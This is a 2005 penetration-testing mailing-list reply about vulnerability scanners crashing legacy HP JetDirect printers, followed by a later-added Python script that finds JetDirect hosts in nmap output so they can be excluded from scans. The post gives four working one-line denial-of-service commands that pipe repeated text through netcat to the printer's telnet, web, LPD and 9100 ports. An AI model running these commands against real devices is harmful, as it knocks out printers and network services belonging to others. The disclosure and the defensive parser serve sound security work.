Penetration Testing mailing list archives

Re: Experiences with company nCircle and their IP360 product


From: Marco Ivaldi <raptor () 0xdeadbeef info>
Date: Fri, 2 Dec 2005 19:50:41 +0100 (CET)

One other thing I've seen with nCircle (& a few other scanners), if you run internally & have any legacy HP jetdirect printers located on your network, you may want to check with nCircle to see if their scans still lock up those printers.

Actually, it's usually fairly easy to DoS printers, especially if they are using an old firmware release. Here are a few ways to reproduce some HP JetDirect vulnerabilities (tested on J3111A, firmware version G.05.35 -- it's quite old, I didn't bother to test newer releases):

root@charon:~# nmap -A x.x.x.x
Interesting ports on printer.mediaservice.pri (x.x.x.x):
(The 1655 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     HP JetDirect printer telnetd
80/tcp   open  http?
515/tcp  open  printer?
9100/tcp open  jetdirect?
Device type: printer|print server
Running: HP embedded
OS details: HP printer w/JetDirect card

1) TELNET. Crash all network services:
   root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 23
2) HTTP. Crash all network services with funny stack dump on paper:
   root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 80
3) PRINTER. The printer switches indefinitely between data recv and ready:
   root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 515
4) JETDIRECT. Prints ABCD... and leaves the printer in "unstable" status:
   root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 9100

Pretty lame, isn't it? In case someone's interested I've scanned the funny stack dump printed on paper and put it on-line here:

http://www.0xdeadbeef.info/stuff/hp-crash.jpg

Sincerely,

--
Marco Ivaldi
Antifork Research, Inc.   http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233  0394 EF85 2008 DBFD B707
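
For the scanning concern raised in this thread, an added example (not part of the original message): a Python parser for nmap output in the layout shown above that flags hosts fingerprinted as HP JetDirect and lists which of the four services named in the post are open, so those addresses can go on a scanner exclusion list or behind an ACL. The sample scan text, host names and 192.0.2.x addresses are constructed.

```python
import re

# TCP services the post names on the JetDirect card.
JETDIRECT_PORTS = {23, 80, 515, 9100}
HOST_RE = re.compile(r"^(?:Interesting ports on|Nmap scan report for)\s+(.*?):?$")
ADDR_RE = re.compile(r"\(?(\d{1,3}(?:\.\d{1,3}){3})\)?$")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s*(.*)$")
OS_PREFIXES = ("os details:", "running:", "device type:")

# Constructed sample (192.0.2.0/24 is a documentation range).
SAMPLE = """\
Interesting ports on printer-3f.example (192.0.2.10):
PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     HP JetDirect printer telnetd
80/tcp   open  http?
515/tcp  open  printer?
9100/tcp open  jetdirect?
OS details: HP printer w/JetDirect card

Interesting ports on build01.example (192.0.2.20):
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH
9100/tcp open  jetdirect?
OS details: Linux 2.6.X
"""

def find_jetdirect_hosts(nmap_text):
    """Map each host fingerprinted as JetDirect to its open printer-facing ports."""
    hosts, current = {}, None
    for raw in nmap_text.splitlines():
        line = raw.strip()
        host = HOST_RE.match(line)
        if host:
            addr = ADDR_RE.search(host.group(1))
            key = addr.group(1) if addr else host.group(1)
            current = hosts.setdefault(key, {"ports": set(), "printer": False})
            continue
        if current is None:
            continue
        port = PORT_RE.match(line)
        if port:
            if int(port.group(1)) in JETDIRECT_PORTS:
                current["ports"].add(int(port.group(1)))
            # Only the VERSION column is evidence: "jetdirect?" under SERVICE
            # is just nmap's default name for port 9100.
            if "jetdirect" in port.group(3).lower():
                current["printer"] = True
        elif line.lower().startswith(OS_PREFIXES) and "jetdirect" in line.lower():
            current["printer"] = True
    return {a: sorted(h["ports"]) for a, h in hosts.items() if h["printer"]}
```

The second host in the sample has port 9100 open but is not flagged, because nothing in its version or OS lines identifies it as a JetDirect device.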



